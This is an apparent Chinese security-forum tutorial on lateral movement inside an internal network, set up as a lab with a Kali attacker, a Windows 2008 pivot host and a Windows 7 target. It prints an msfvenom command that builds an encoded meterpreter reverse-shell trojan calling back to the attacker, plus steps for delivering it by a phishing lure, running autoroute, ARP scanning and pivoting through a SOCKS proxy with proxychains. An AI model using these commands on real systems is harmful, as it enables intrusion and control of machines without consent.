电脑疯子技术论坛|电脑极客社区

微信扫一扫 分享朋友圈

已有 2073 人浏览分享

内网横向移动

[复制链接]
2073 0
内网横向移动
1实验环境准备
攻击机: kali2020  ip:192.168.43.10
跳板机: win2008  ip:192.168.43.6  ip:172.10.1.1
内网服务器:win7  ip:172.10.1.2
前期工作攻击机制作钓鱼木马 诱导跳板机上线,跳板机与攻击机建立会话
步骤1 攻击机制作生成木马
msfVENOM  -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.16
8.43.10 LPORT=4444 -b"\x00" -e x86/shikata_ga_nai -f exe >msf.exe

154849nomk4xqxnh4dm4oq.png

步骤2 攻击机开启python,开启简单的http server,通过web服务来传送木马
python -m SimpleHTTPServer 888

155016twkogwfz7cckengh.png.thumb.jpg

步骤3攻击机开启监听模式

66.jpg

步骤4跳板机win08下载木马 并运行

155113gmlpjjjxgz0e0exx.png.thumb.jpg

步骤5攻击机kali上弹出会话 并提升到系统权限

62.png

内网横向移动
拿下跳板机系统权限后,攻击机可以查看跳板机的数据 但是与内网区域的win7主机无法联通 为了扩大攻击战果
我们可以使用代理和端口转发获得更多内网中主机权限 得到更多的数据
1拿下跳板机查看网络信息ipconfig可以查看到跳板机win7有两块网卡IP地址
分别为192.168.43.6和172.10.1.1

61.png
60.png

2自动添加路由
meterpreter > run post/multi/manage/autoroute

29.jpg

3查看内网区域172.10网段那些主机是在线的 用arp扫描 发现172.10.1.2和172.10.1.1两台主机在线

28.jpg

4经过分析ip172.10.1.1是win08跳板机 为了扩大攻击战果 下一步进行横向移动,获取ip172.10.1.2的权限。步骤2中添加
的自动路由只能在meterpreter中起作用 出了meterpreter使用其他工具自动路由就不起作用了 为了能在meterpreter会
话外使用其他工具 我们可以建立socket代理 进行流量转发

26.jpg

5设置本地监听地址为192.168.43.10(set srvhost=192.168.43.10查看配置
本地默认监听端口为1080,设置完后并执行

22.png

6修改proxychains.conf 修改地址与端口 与步骤5中设置的本地
监听地址与端口一致并保存

19.jpg
18.png

7配置完后,使用其他工具 在前面加上proxychains

18.jpg

您需要登录后才可以回帖 登录 | 注册

本版积分规则

1

关注

0

粉丝

9021

主题
精彩推荐
热门资讯
网友晒图
图文推荐

Powered by Pcgho! X3.4

© 2008-2022 Pcgho Inc.